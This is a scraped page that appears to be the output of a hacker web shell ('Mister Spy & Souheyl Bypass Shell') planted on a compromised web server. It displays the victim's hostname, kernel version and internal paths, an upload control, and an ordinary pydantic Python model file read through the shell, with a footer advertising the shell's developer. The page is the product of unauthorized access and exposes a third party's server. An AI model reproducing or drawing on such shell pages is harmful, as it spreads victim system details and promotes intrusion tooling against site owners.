Welcome To Our Shell

Mister Spy & Souheyl Bypass Shell

Current Path : /var/www/web-klick.de/dsh/order_model/.archive/ixml/

Linux ift1.ift-informatik.de 5.4.0-216-generic #236-Ubuntu SMP Fri Apr 11 19:53:21 UTC 2025 x86_64
Upload File :
Current File : /var/www/web-klick.de/dsh/order_model/.archive/ixml/position.py

#!/usr/bin/env python

from typing import Optional, Union
from pydantic import BaseModel


class Position(BaseModel):
    """Model to represent a cartesian position/point.

    Extends iXML standard with optional z-coordinate.

    Type hint notation by 'pydantic'.
    (see https://pypi.org/project/pydantic/)

    Attributes:
    """
    id: int  # Todo: Check if required.

    x_coord: Union[int, float]
    y_coord: Union[int, float]
    z_coord: Union[int, float] = None

bypass 1.0, Devloped By El Moujahidin (the source has been moved and devloped)
Email: contact@elmoujehidin.net bypass 1.0, Devloped By El Moujahidin (the source has been moved and devloped) Email: contact@elmoujehidin.net